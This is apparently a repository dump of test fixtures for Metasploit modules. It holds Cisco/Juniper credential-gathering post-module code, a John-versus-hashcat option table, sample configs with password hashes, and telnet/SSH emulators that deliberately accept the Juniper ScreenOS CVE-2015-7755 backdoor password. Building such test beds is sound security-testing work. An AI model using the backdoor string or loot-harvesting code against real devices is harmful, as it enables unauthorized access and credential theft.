input|%/ 106 | print_status("Gathering info from #{ec['cmd']}") 107 | # Process configuration 108 | if ec['cmd'] =~/show run/ 109 | print_status("Parsing running configuration for credentials and secrets...") 110 | cisco_ios_config_eater(host,port,cmd_out) 111 | end 112 | cmd_loc = store_loot("cisco.ios.#{ec['fn']}", 113 | "text/plain", 114 | session, 115 | cmd_out.strip, 116 | "#{ec['fn']}.txt", 117 | ec['desc']) 118 | vprint_status("Saving to #{cmd_loc}") 119 | end 120 | end 121 | 122 | # run commands found in exec mode under privilege 1 123 | def enum_exec(prompt) 124 | exec_commands = [ 125 | { 126 | "cmd" => "show ssh", 127 | "fn" => "ssh_sessions", 128 | "desc" => "SSH Sessions on Cisco Device" 129 | }, 130 | { 131 | "cmd" => "show sessions", 132 | "fn" => "telnet_sessions", 133 | "desc" => "Telnet Sessions on Cisco Device" 134 | }, 135 | { 136 | "cmd" => "show login", 137 | "fn" => "login_settings", 138 | "desc" => "Login settings on Cisco Device" 139 | }, 140 | { 141 | "cmd" => "show ip interface brief", 142 | "fn" => "interface_info", 143 | "desc" => "IP Enabled Interfaces on Cisco Device" 144 | }, 145 | { 146 | "cmd" => "show inventory", 147 | "fn" => "hw_inventory", 148 | "desc" => "Hardware component inventory for Cisco Device" 149 | }] 150 | exec_commands.each do |ec| 151 | cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"") 152 | next if cmd_out =~ /Invalid input|%/ 153 | print_status("Gathering info from #{ec['cmd']}") 154 | cmd_loc = store_loot("cisco.ios.#{ec['fn']}", 155 | "text/plain", 156 | session, 157 | cmd_out.strip, 158 | "#{ec['fn']}.txt", 159 | ec['desc']) 160 | vprint_status("Saving to #{cmd_loc}") 161 | end 162 | end 163 | end 164 | -------------------------------------------------------------------------------- /ipfire-2.15.i586-full-core82.iso: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:e0c46eecbba6b6c8b56dc591884f5a2391784661b0d4f6bb491e3169eea17203 3 | size 138412032 4 | -------------------------------------------------------------------------------- /ipfire-2.19.x86_64-full-core100.iso: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:2a44a95f99af3da7ec7728061ba40f9a0ea9ad3febafff0a5ef18a6e054857b3 3 | size 166723584 4 | -------------------------------------------------------------------------------- /john_vs_hashcat.md: -------------------------------------------------------------------------------- 1 | # General Settings 2 | 3 | | Description | JtR | hashcat | 4 | |-----------------|----------------|-------------------| 5 | | session | --session | --session | 6 | | no logging | --nolog | --logfile-disable | 7 | | config file | --config | (n/a) | 8 | | previous cracks | --pot | --potfile-path | 9 | | type of hashes | --format | --hash-type | 10 | | wordlist | --wordlist | (last parameter) | 11 | | incremental | --incremental | --increment | 12 | | rules | --rules | --rules-file | 13 | | max run time | --max-run-time | --runtime | 14 | | show results | --show | --show | 15 | 16 | # Hash Setting 17 | 18 | | Hash | JtR john --list=formats | hashcathashcat -h | 19 | |-------------------|-------------------------|--------------------| 20 | | des | descrypt | 1500 | 21 | | md5 (crypt is $1$)| md5crypt | 500 | 22 | | sha1 | | 100 | 23 | | bsdi | bsdicrypt | 12400 | 24 | | sha256 | sha256crypt | 7400 | 25 | | sha512 | sha512crypt | 1800 | 26 | | blowfish | bcrypt | 3200 | 27 | | lanman | lm | 3000 | 28 | | NTLM | nt | 1000 | 29 | | mssql (05) | mssql | 131 | 30 | | mssql12 | mssql12 | 1731 | 31 | | mssql (2012/2014) | mssql05 | 132 | 32 | | oracle (10) | oracle | 3100 | 33 | | oracle 11 | oracle11 | 112 | 34 | | oracle 12 | oracle12c | 12300 | 35 | | postgres | dynamic_1034 | 12 | 36 | | mysql | mysql | 200 | 37 | | mysql-sha1 | mysql-sha1 | 300 | 38 | -------------------------------------------------------------------------------- /juniper_ex2200.config: -------------------------------------------------------------------------------- 1 | show configuration 2 | ## Last commit: 2016-08-15 13:35:48 UTC by root 3 | version 12.3R7.7; 4 | system { 5 | host-name h00dieJuniperEx2200; 6 | root-authentication { 7 | encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA 8 | } 9 | login { 10 | user newuser { 11 | uid 2000; 12 | class super-user; 13 | authentication { 14 | encrypted-password "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/"; ## SECRET-DATA 15 | } 16 | } 17 | user newuser2 { 18 | uid 2002; 19 | class operator; 20 | authentication { 21 | encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA 22 | } 23 | } 24 | user newuser3 { 25 | uid 2003; 26 | class read-only; 27 | authentication { 28 | encrypted-password "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93."; ## SECRET-DATA 29 | } 30 | } 31 | user newuser4 { 32 | uid 2004; 33 | class unauthorized; 34 | authentication { 35 | encrypted-password "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/"; ## SECRET-DATA 36 | } 37 | } 38 | } 39 | services { 40 | ssh { 41 | root-login allow; 42 | } 43 | web-management { 44 | http; 45 | } 46 | dhcp { 47 | traceoptions { 48 | file dhcp_logfile; 49 | level all; 50 | flag all; 51 | } 52 | pool 192.168.10.0/24 { 53 | address-range low 192.168.10.2 high 192.168.10.254; 54 | } 55 | } 56 | } 57 | syslog { 58 | user * { 59 | any emergency; 60 | } 61 | file messages { 62 | any notice; 63 | authorization info; 64 | } 65 | file interactive-commands { 66 | interactive-commands any; 67 | } 68 | } 69 | } 70 | chassis { 71 | alarm { 72 | management-ethernet { 73 | link-down ignore; 74 | } 75 | } 76 | auto-image-upgrade; 77 | } 78 | interfaces { 79 | ge-0/0/0 { 80 | unit 0 { 81 | family inet { 82 | address 192.168.1.3/32; 83 | } 84 | } 85 | } 86 | ge-0/0/1 { 87 | unit 0 { 88 | family inet { 89 | address 192.168.1.4/32; 90 | } 91 | } 92 | } 93 | ge-0/0/2 { 94 | unit 0 { 95 | family inet { 96 | address 192.168.1.5/24; 97 | } 98 | } 99 | } 100 | ge-0/0/3 { 101 | unit 0 { 102 | family ethernet-switching; 103 | } 104 | } 105 | ge-0/0/4 { 106 | unit 0 { 107 | family ethernet-switching; 108 | } 109 | } 110 | ge-0/0/5 { 111 | unit 0 { 112 | family ethernet-switching; 113 | } 114 | } 115 | ge-0/0/6 { 116 | unit 0 { 117 | family ethernet-switching; 118 | } 119 | } 120 | ge-0/0/7 { 121 | unit 0 { 122 | family ethernet-switching; 123 | } 124 | } 125 | ge-0/0/8 { 126 | unit 0 { 127 | family ethernet-switching; 128 | } 129 | } 130 | ge-0/0/9 { 131 | unit 0 { 132 | family ethernet-switching; 133 | } 134 | } 135 | ge-0/0/10 { 136 | unit 0 { 137 | family ethernet-switching; 138 | } 139 | } 140 | ge-0/0/11 { 141 | unit 0 { 142 | family ethernet-switching; 143 | } 144 | } 145 | ge-0/0/12 { 146 | unit 0 { 147 | family ethernet-switching; 148 | } 149 | } 150 | ge-0/0/13 { 151 | unit 0 { 152 | family ethernet-switching; 153 | } 154 | } 155 | ge-0/0/14 { 156 | unit 0 { 157 | family ethernet-switching; 158 | } 159 | } 160 | ge-0/0/15 { 161 | unit 0 { 162 | family ethernet-switching; 163 | } 164 | } 165 | ge-0/0/16 { 166 | unit 0 { 167 | family ethernet-switching; 168 | } 169 | } 170 | ge-0/0/17 { 171 | unit 0 { 172 | family ethernet-switching; 173 | } 174 | } 175 | ge-0/0/18 { 176 | unit 0 { 177 | family ethernet-switching; 178 | } 179 | } 180 | ge-0/0/19 { 181 | unit 0 { 182 | family ethernet-switching; 183 | } 184 | } 185 | ge-0/0/20 { 186 | unit 0 { 187 | family ethernet-switching; 188 | } 189 | } 190 | ge-0/0/21 { 191 | unit 0 { 192 | family ethernet-switching; 193 | } 194 | } 195 | ge-0/0/22 { 196 | unit 0 { 197 | family ethernet-switching; 198 | } 199 | } 200 | ge-0/0/23 { 201 | unit 0 { 202 | family ethernet-switching; 203 | } 204 | } 205 | ge-0/0/24 { 206 | unit 0 { 207 | family ethernet-switching; 208 | } 209 | } 210 | ge-0/0/25 { 211 | unit 0 { 212 | family ethernet-switching; 213 | } 214 | } 215 | ge-0/0/26 { 216 | unit 0 { 217 | family ethernet-switching; 218 | } 219 | } 220 | ge-0/0/27 { 221 | unit 0 { 222 | family ethernet-switching; 223 | } 224 | } 225 | ge-0/0/28 { 226 | unit 0 { 227 | family ethernet-switching; 228 | } 229 | } 230 | ge-0/0/29 { 231 | unit 0 { 232 | family ethernet-switching; 233 | } 234 | } 235 | ge-0/0/30 { 236 | unit 0 { 237 | family ethernet-switching; 238 | } 239 | } 240 | ge-0/0/31 { 241 | unit 0 { 242 | family ethernet-switching; 243 | } 244 | } 245 | ge-0/0/32 { 246 | unit 0 { 247 | family ethernet-switching; 248 | } 249 | } 250 | ge-0/0/33 { 251 | unit 0 { 252 | family ethernet-switching; 253 | } 254 | } 255 | ge-0/0/34 { 256 | unit 0 { 257 | family ethernet-switching; 258 | } 259 | } 260 | ge-0/0/35 { 261 | unit 0 { 262 | family ethernet-switching; 263 | } 264 | } 265 | ge-0/0/36 { 266 | unit 0 { 267 | family ethernet-switching; 268 | } 269 | } 270 | ge-0/0/37 { 271 | unit 0 { 272 | family ethernet-switching; 273 | } 274 | } 275 | ge-0/0/38 { 276 | unit 0 { 277 | family ethernet-switching; 278 | } 279 | } 280 | ge-0/0/39 { 281 | unit 0 { 282 | family ethernet-switching; 283 | } 284 | } 285 | ge-0/0/40 { 286 | unit 0 { 287 | family ethernet-switching; 288 | } 289 | } 290 | ge-0/0/41 { 291 | unit 0 { 292 | family ethernet-switching; 293 | } 294 | } 295 | ge-0/0/42 { 296 | unit 0 { 297 | family ethernet-switching; 298 | } 299 | } 300 | ge-0/0/43 { 301 | unit 0 { 302 | family ethernet-switching; 303 | } 304 | } 305 | ge-0/0/44 { 306 | unit 0 { 307 | family ethernet-switching; 308 | } 309 | } 310 | ge-0/0/45 { 311 | unit 0 { 312 | family ethernet-switching; 313 | } 314 | } 315 | ge-0/0/46 { 316 | unit 0 { 317 | family ethernet-switching; 318 | } 319 | } 320 | ge-0/0/47 { 321 | unit 0 { 322 | family ethernet-switching; 323 | } 324 | } 325 | ge-0/1/0 { 326 | unit 0 { 327 | family ethernet-switching; 328 | } 329 | } 330 | ge-0/1/1 { 331 | unit 0 { 332 | family ethernet-switching; 333 | } 334 | } 335 | ge-0/1/2 { 336 | unit 0 { 337 | family ethernet-switching; 338 | } 339 | } 340 | ge-0/1/3 { 341 | unit 0 { 342 | family ethernet-switching; 343 | } 344 | } 345 | me0 { 346 | unit 0 { 347 | family inet { 348 | address 192.168.1.1/24; 349 | } 350 | } 351 | } 352 | pp0 { 353 | unit 0 { 354 | ppp-options { 355 | pap { 356 | local-name "'pap_username'"; 357 | local-password "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR"; ## SECRET-DATA 358 | } 359 | } 360 | } 361 | } 362 | st0 { 363 | unit 1; 364 | } 365 | vlan { 366 | unit 0 { 367 | family inet { 368 | dhcp { 369 | vendor-id Juniper-ex2200-48t-4g; 370 | } 371 | } 372 | } 373 | } 374 | } 375 | snmp { 376 | name "snmp name"; 377 | description "snmp description"; 378 | location basement; 379 | contact admin; 380 | view jweb-view-all { 381 | oid .1 include; 382 | } 383 | community read { 384 | authorization read-only; 385 | } 386 | community write { 387 | view jweb-view-all; 388 | authorization read-write; 389 | } 390 | community public { 391 | authorization read-only; 392 | } 393 | community private { 394 | authorization read-write; 395 | } 396 | community secretsauce { 397 | authorization read-write; 398 | } 399 | community "hello there" { 400 | authorization read-write; 401 | } 402 | } 403 | routing-options { 404 | static { 405 | route 0.0.0.0/0 next-hop 192.168.1.254; 406 | } 407 | } 408 | protocols { 409 | igmp-snooping { 410 | vlan all; 411 | } 412 | rstp; 413 | lldp { 414 | interface all; 415 | } 416 | lldp-med { 417 | interface all; 418 | } 419 | } 420 | access { 421 | radius-server { 422 | 1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA 423 | } 424 | } 425 | ethernet-switching-options { 426 | storm-control { 427 | interface all; 428 | } 429 | } 430 | vlans { 431 | default { 432 | l3-interface vlan.0; 433 | } 434 | } 435 | 436 | {master:0} 437 | newuser@h00dieJuniperEx2200> -------------------------------------------------------------------------------- /juniper_ex2200_access_denied.config: -------------------------------------------------------------------------------- 1 | show configuration 2 | ## Last commit: 2016-08-15 13:35:48 UTC by root 3 | version /* ACCESS-DENIED */; 4 | system { /* ACCESS-DENIED */ }; 5 | chassis { /* ACCESS-DENIED */ }; 6 | interfaces { /* ACCESS-DENIED */ }; 7 | snmp { /* ACCESS-DENIED */ }; 8 | routing-options { /* ACCESS-DENIED */ }; 9 | protocols { /* ACCESS-DENIED */ }; 10 | access { /* ACCESS-DENIED */ }; 11 | ethernet-switching-options { /* ACCESS-DENIED */ }; 12 | vlans { /* ACCESS-DENIED */ }; 13 | 14 | {master:0} 15 | newuser2@h00dieJuniperEx2200> -------------------------------------------------------------------------------- /juniper_firmware/README.md: -------------------------------------------------------------------------------- 1 | # Instructions 2 | The files in the directory are to load a firmware to the Fortinet SSG-5 and SSG-20 which contains CVE-2015-7755. 3 | Please see [Juniper Instructions](http://kb.juniper.net/InfoCenter/index?page=content&id=TSB16495&actp=search) to properly load the firmware. -------------------------------------------------------------------------------- /juniper_firmware/imagekey.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/juniper_firmware/imagekey.cer -------------------------------------------------------------------------------- /juniper_firmware/ssg5ssg20.6.3.0r19.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/juniper_firmware/ssg5ssg20.6.3.0r19.0 -------------------------------------------------------------------------------- /juniper_ssg5_emulator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #code base from http://homepages.ius.edu/jfdoyle/B438/HTML/chatserver4chatserver5Python.htm 4 | #this is a juniper ssg5 emulator for testing against the Metasploit modules for brocade, 5 | #based on the SSG5 I own. We've only emulated a few functions (?, get config, get system) 6 | 7 | import socket, threading 8 | import string 9 | import time 10 | from juniper_strings import juniper 11 | 12 | #format is ('username','password') 13 | un_pass_config = { 14 | ('netscreen','netscreen'), 15 | } 16 | 17 | 18 | class server(threading.Thread) : 19 | def __init__(self, (socket, address) ): 20 | threading.Thread.__init__(self) 21 | self.SOCKET=socket 22 | self.ADDRESS=address 23 | 24 | def run(self) : 25 | lock.acquire() 26 | vector.append(self) 27 | lock.release() 28 | print 'Connected ', self.ADDRESS 29 | valid_login = False 30 | throwaway=self.SOCKET.recv(1024) # catch a strange issue where we're getting nothing 31 | while not valid_login: #login loop 32 | #send the login banner 33 | self.SOCKET.send("Remote Management Console\n") 34 | self.SOCKET.send('login: ') 35 | username=self.SOCKET.recv(1024) # Read from client 36 | self.SOCKET.send('password: ') 37 | password=self.SOCKET.recv(1024) # Read from client 38 | username = username.strip() 39 | password = password.strip() 40 | if password == "<<< %s(un='%s') = %u" and username != "": #CVE-2015-7755 41 | print("Successful login via Juniper backdoor CVE-2015-7755 <<< %s(un='%s') = %u") 42 | valid_login = True 43 | else: 44 | for user,passw in un_pass_config: 45 | if user==username and passw == password: 46 | print("Successful login via %s:%s" %(user,passw)) 47 | valid_login = True 48 | if not valid_login: 49 | print("FAILED login via %s:%s" %(username,password)) 50 | time.sleep(5) 51 | self.SOCKET.send(" ### Login failed") 52 | while True: 53 | self.SOCKET.send(juniper.get("PROMPT")) 54 | From=self.SOCKET.recv(1024) # Read from client 55 | #telnet clients tend to send some binary before giving input to the client to type... so we'll filter that 56 | if len(From) <= 0: 57 | continue 58 | if not From[0] in string.printable: 59 | continue 60 | From_upper = From.upper().strip() 61 | if From_upper == 'EXIT': 62 | self.SOCKET.close() 63 | break 64 | else: 65 | self.SOCKET.send(juniper.get(From_upper, ' ^------unknown keyword %s\n' %(From))) 66 | print "User Input:", From.replace("\n","") 67 | print 'Disconnected ', self.ADDRESS 68 | lock.acquire() 69 | vector.remove(self) 70 | lock.release() 71 | 72 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 73 | while True: 74 | try: 75 | s.bind(('', 23)) 76 | break 77 | except socket.error: 78 | print("[e] Address in use or permission error, sleeping 10sec then trying again") 79 | time.sleep(10) 80 | s.listen(4) 81 | vector = [] 82 | lock=threading.Lock() 83 | print("Server started") 84 | while True : # Wait for connection/run server 85 | server( s.accept() ).start(); 86 | -------------------------------------------------------------------------------- /juniper_ssg5_screenos.conf: -------------------------------------------------------------------------------- 1 | unset key protection enable 2 | set clock timezone 0 3 | set vrouter trust-vr sharable 4 | set vrouter "untrust-vr" 5 | exit 6 | set vrouter "trust-vr" 7 | unset auto-route-export 8 | exit 9 | set alg appleichat enable 10 | unset alg appleichat re-assembly enable 11 | set alg sctp enable 12 | set auth-server "Local" id 0 13 | set auth-server "Local" server-name "Local" 14 | set auth default auth server "Local" 15 | set auth radius accounting port 1646 16 | set admin name "netscreen" 17 | set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn" 18 | set admin auth web timeout 10 19 | set admin auth dial-in timeout 3 20 | set admin auth server "Local" 21 | set admin format dos 22 | set zone "Trust" vrouter "trust-vr" 23 | set zone "Untrust" vrouter "trust-vr" 24 | set zone "DMZ" vrouter "trust-vr" 25 | set zone "VLAN" vrouter "trust-vr" 26 | set zone "Untrust-Tun" vrouter "trust-vr" 27 | set zone "Trust" tcp-rst 28 | set zone "Untrust" block 29 | unset zone "Untrust" tcp-rst 30 | set zone "MGT" block 31 | unset zone "V1-Trust" tcp-rst 32 | unset zone "V1-Untrust" tcp-rst 33 | set zone "DMZ" tcp-rst 34 | unset zone "V1-DMZ" tcp-rst 35 | unset zone "VLAN" tcp-rst 36 | set zone "Untrust" screen tear-drop 37 | set zone "Untrust" screen syn-flood 38 | set zone "Untrust" screen ping-death 39 | set zone "Untrust" screen ip-filter-src 40 | set zone "Untrust" screen land 41 | set zone "V1-Untrust" screen tear-drop 42 | set zone "V1-Untrust" screen syn-flood 43 | set zone "V1-Untrust" screen ping-death 44 | set zone "V1-Untrust" screen ip-filter-src 45 | set zone "V1-Untrust" screen land 46 | set interface "ethernet0/0" zone "Untrust" 47 | set interface "ethernet0/1" zone "DMZ" 48 | set interface "bgroup0" zone "Trust" 49 | set interface bgroup0 port ethernet0/2 50 | set interface bgroup0 port ethernet0/3 51 | set interface bgroup0 port ethernet0/4 52 | set interface bgroup0 port ethernet0/5 53 | set interface bgroup0 port ethernet0/6 54 | unset interface vlan1 ip 55 | set interface bgroup0 ip 192.168.1.1/24 56 | set interface bgroup0 nat 57 | unset interface vlan1 bypass-others-ipsec 58 | unset interface vlan1 bypass-non-ip 59 | set interface bgroup0 ip manageable 60 | set interface ethernet0/0 dhcp client enable 61 | set interface ethernet0/0 dhcp client settings autoconfig 62 | set interface "serial0/0" modem settings "USR" init "AT&F" 63 | set interface "serial0/0" modem settings "USR" active 64 | set interface "serial0/0" modem speed 115200 65 | set interface "serial0/0" modem retry 3 66 | set interface "serial0/0" modem interval 10 67 | set interface "serial0/0" modem idle-time 10 68 | set ip tftp retry 30 69 | set ip tftp timeout 30 70 | set flow tcp-mss 71 | unset flow no-tcp-seq-check 72 | set flow tcp-syn-check 73 | unset flow tcp-syn-bit-check 74 | set flow reverse-route clear-text prefer 75 | set flow reverse-route tunnel always 76 | set pki authority default scep mode "auto" 77 | set pki x509 default cert-path partial 78 | set user "testuser" uid 1 79 | set user "testuser" type auth 80 | set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=" 81 | set user "testuser" enable 82 | set crypto-policy 83 | exit 84 | set ike respond-bad-spi 1 85 | set ike ikev2 ike-sa-soft-lifetime 60 86 | unset ike ikeid-enumeration 87 | unset ike dos-protection 88 | unset ipsec access-session enable 89 | set ipsec access-session maximum 5000 90 | set ipsec access-session upper-threshold 0 91 | set ipsec access-session lower-threshold 0 92 | set ipsec access-session dead-p2-sa-timeout 0 93 | unset ipsec access-session log-error 94 | unset ipsec access-session info-exch-connected 95 | unset ipsec access-session use-error-log 96 | set url protocol websense 97 | exit 98 | set policy id 1 from "Trust" to "Untrust" "Any" "Any" "ANY" permit 99 | set policy id 1 100 | exit 101 | set nsmgmt bulkcli reboot-timeout 60 102 | set ssh version v2 103 | set config lock timeout 5 104 | unset license-key auto-update 105 | set telnet client enable 106 | set snmp port listen 161 107 | set snmp port trap 162 108 | set snmpv3 local-engine id "0162122013002408" 109 | set vrouter "untrust-vr" 110 | exit 111 | set vrouter "trust-vr" 112 | unset add-default-route 113 | exit 114 | set vrouter "untrust-vr" 115 | exit 116 | set vrouter "trust-vr" 117 | exit 118 | -------------------------------------------------------------------------------- /juniper_ssg5_ssh_emulator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (C) 2003-2007 Robey Pointer 4 | # 5 | # This file is part of paramiko. 6 | # 7 | # Paramiko is free software; you can redistribute it and/or modify it under the 8 | # terms of the GNU Lesser General Public License as published by the Free 9 | # Software Foundation; either version 2.1 of the License, or (at your option) 10 | # any later version. 11 | # 12 | # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY 13 | # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 14 | # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more 15 | # details. 16 | # 17 | # You should have received a copy of the GNU Lesser General Public License 18 | # along with Paramiko; if not, write to the Free Software Foundation, Inc., 19 | # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. 20 | 21 | """ 22 | This code is based off of https://github.com/paramiko/paramiko/blob/master/demos/demo_server.py 23 | """ 24 | import base64 25 | from binascii import hexlify 26 | import os 27 | import socket 28 | import sys 29 | import threading 30 | import traceback 31 | 32 | from juniper_strings import juniper 33 | 34 | import paramiko 35 | from paramiko.py3compat import b, u, decodebytes 36 | 37 | # setup logging 38 | paramiko.util.log_to_file('demo_server.log') 39 | 40 | host_key = paramiko.RSAKey(filename='test_rsa.key') 41 | #host_key = paramiko.DSSKey(filename='test_dss.key') 42 | 43 | print('Read key: ' + u(hexlify(host_key.get_fingerprint()))) 44 | 45 | 46 | class Server (paramiko.ServerInterface): 47 | # 'data' is the output of base64.encodestring(str(key)) 48 | # (using the "user_rsa_key" files) 49 | data = (b'AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp' 50 | b'fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC' 51 | b'KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT' 52 | b'UWT10hcuO4Ks8=') 53 | good_pub_key = paramiko.RSAKey(data=decodebytes(data)) 54 | 55 | def __init__(self): 56 | self.event = threading.Event() 57 | 58 | def check_channel_request(self, kind, chanid): 59 | if kind == 'session': 60 | return paramiko.OPEN_SUCCEEDED 61 | return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED 62 | 63 | def check_auth_password(self, username, password): 64 | if password == "<<< %s(un='%s') = %u" and username != "": #CVE-2015-7755 65 | print("Successful login via Juniper backdoor CVE-2015-7755 <<< %s(un='%s') = %u") 66 | return paramiko.AUTH_SUCCESSFUL 67 | elif (username == 'netscreen') and (password == 'netscreen'): 68 | return paramiko.AUTH_SUCCESSFUL 69 | return paramiko.AUTH_FAILED 70 | 71 | # def check_auth_publickey(self, username, key): 72 | # print('Auth attempt with key: ' + u(hexlify(key.get_fingerprint()))) 73 | # if (username == 'robey') and (key == self.good_pub_key): 74 | # return paramiko.AUTH_SUCCESSFUL 75 | # return paramiko.AUTH_FAILED 76 | 77 | # def check_auth_gssapi_with_mic(self, username, 78 | # gss_authenticated=paramiko.AUTH_FAILED, 79 | # cc_file=None): 80 | # """ 81 | # .. note:: 82 | # We are just checking in `AuthHandler` that the given user is a 83 | # valid krb5 principal! We don't check if the krb5 principal is 84 | # allowed to log in on the server, because there is no way to do that 85 | # in python. So if you develop your own SSH server with paramiko for 86 | # a certain platform like Linux, you should call ``krb5_kuserok()`` in 87 | # your local kerberos library to make sure that the krb5_principal 88 | # has an account on the server and is allowed to log in as a user. 89 | # 90 | # .. seealso:: 91 | # `krb5_kuserok() man page 92 | # `_ 93 | # """ 94 | # if gss_authenticated == paramiko.AUTH_SUCCESSFUL: 95 | # return paramiko.AUTH_SUCCESSFUL 96 | # return paramiko.AUTH_FAILED 97 | 98 | def check_auth_gssapi_keyex(self, username, 99 | gss_authenticated=paramiko.AUTH_FAILED, 100 | cc_file=None): 101 | if gss_authenticated == paramiko.AUTH_SUCCESSFUL: 102 | return paramiko.AUTH_SUCCESSFUL 103 | return paramiko.AUTH_FAILED 104 | 105 | def enable_auth_gssapi(self): 106 | UseGSSAPI = False 107 | GSSAPICleanupCredentials = False 108 | return UseGSSAPI 109 | 110 | def get_allowed_auths(self, username): 111 | return 'password' 112 | 113 | def check_channel_shell_request(self, channel): 114 | self.event.set() 115 | return True 116 | 117 | def check_channel_pty_request(self, channel, term, width, height, pixelwidth, 118 | pixelheight, modes): 119 | return True 120 | 121 | 122 | DoGSSAPIKeyExchange = False 123 | 124 | # now connect 125 | try: 126 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 127 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 128 | sock.bind(('', 22)) 129 | except Exception as e: 130 | print('*** Bind failed: ' + str(e)) 131 | traceback.print_exc() 132 | sys.exit(1) 133 | 134 | try: 135 | sock.listen(100) 136 | print('Listening for connection ...') 137 | client, addr = sock.accept() 138 | except Exception as e: 139 | print('*** Listen/accept failed: ' + str(e)) 140 | traceback.print_exc() 141 | sys.exit(1) 142 | 143 | print('Got a connection!') 144 | 145 | try: 146 | t = paramiko.Transport(client, gss_kex=DoGSSAPIKeyExchange) 147 | t.set_gss_host(socket.getfqdn("")) 148 | try: 149 | t.load_server_moduli() 150 | except: 151 | print('(Failed to load moduli -- gex will be unsupported.)') 152 | raise 153 | t.add_server_key(host_key) 154 | server = Server() 155 | try: 156 | t.start_server(server=server) 157 | except paramiko.SSHException: 158 | print('*** SSH negotiation failed.') 159 | sys.exit(1) 160 | 161 | # wait for auth 162 | chan = t.accept(20) 163 | if chan is None: 164 | print('*** No channel.') 165 | sys.exit(1) 166 | print('Authenticated!') 167 | 168 | server.event.wait(10) 169 | if not server.event.is_set(): 170 | print('*** Client never asked for a shell.') 171 | sys.exit(1) 172 | while True: 173 | chan.send(juniper.get("PROMPT")) 174 | From = " " 175 | while ord(From[-1]) != 13: 176 | From += chan.recv(1024) 177 | chan.send(From[-1]) #echo back to user screen 178 | From_upper = From.upper().strip() 179 | if From_upper == 'EXIT': 180 | chan.close() 181 | break 182 | else: 183 | # chan.send('\n') 184 | output = juniper.get(From_upper, ' ^------unknown keyword %s\n' %(From)) 185 | chan.send('\r\n') 186 | for line in output.split('\n'): 187 | chan.send(line + '\r\n') 188 | print "User Input:", From.replace("\n","") 189 | 190 | 191 | except Exception as e: 192 | print('*** Caught exception: ' + str(e.__class__) + ': ' + str(e)) 193 | traceback.print_exc() 194 | try: 195 | t.close() 196 | except: 197 | pass 198 | sys.exit(1) 199 | 200 | 201 | -------------------------------------------------------------------------------- /juniper_strings.py: -------------------------------------------------------------------------------- 1 | juniper = { 2 | 'GET SYSTEM':"""Product Name: SSG5-Serial 3 | Serial Number: 0000000000000008, Control Number: 00000000 4 | Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0) 5 | Flash Type: Samsung 6 | Software Version: 6.3.0r19.0, Type: Firewall+VPN 7 | Feature: AV-K 8 | BOOT Loader Version: 1.3.2 9 | Compiled by build_master at: Sun Apr 19 21:42:28 PDT 2015 10 | Base Mac: 0000.0000.a3c0 11 | File Name: ssg5ssg20.6.3.0r19.0, Checksum: 8c102d42 12 | , Total Memory: 128MB 13 | 14 | Date 03/28/2016 19:51:01, Daylight Saving Time enabled 15 | The Network Time Protocol is Disabled 16 | Up 0 hours 26 minutes 29 seconds Since 28Mar2016:19:24:32 17 | Total Device Resets: 2, Last Device Reset at: 03/27/2016 19:17:05 18 | 19 | System in NAT/route mode. 20 | 21 | Use interface IP, Config Port: 80 22 | Manager IP enforced: False 23 | Manager IPs: 0 24 | 25 | Address Mask Vsys 26 | ---------------------------------------- ---------------------------------------- -------------------- 27 | User Name: netscreen 28 | 29 | Interface serial0/0: 30 | description serial0/0 31 | number 21, if_info 1848, if_index 0 32 | link down, phy-link down, admin status up 33 | status change:0 34 | vsys Root, zone Null, vr untrust-vr 35 | admin mtu 0, operating mtu 1500, default mtu 1500 36 | *ip 0.0.0.0/0 mac 0000.0000.a300 37 | bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps] 38 | configured ingress mbw 0kbps, current bw 0kbps 39 | total allocated gbw 0kbps 40 | Interface ethernet0/0: 41 | description ethernet0/0 42 | number 0, if_info 0, if_index 0, mode route 43 | link down, phy-link down, admin status up 44 | status change:0 45 | vsys Root, zone Untrust, vr trust-vr 46 | dhcp client enabled 47 | PPPoE disabled 48 | admin mtu 0, operating mtu 1500, default mtu 1500 49 | *ip 0.0.0.0/0 mac 0000.0000.a301 50 | *manage ip 0.0.0.0, mac 0000.0000.a301 51 | bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps] 52 | configured ingress mbw 0kbps, current bw 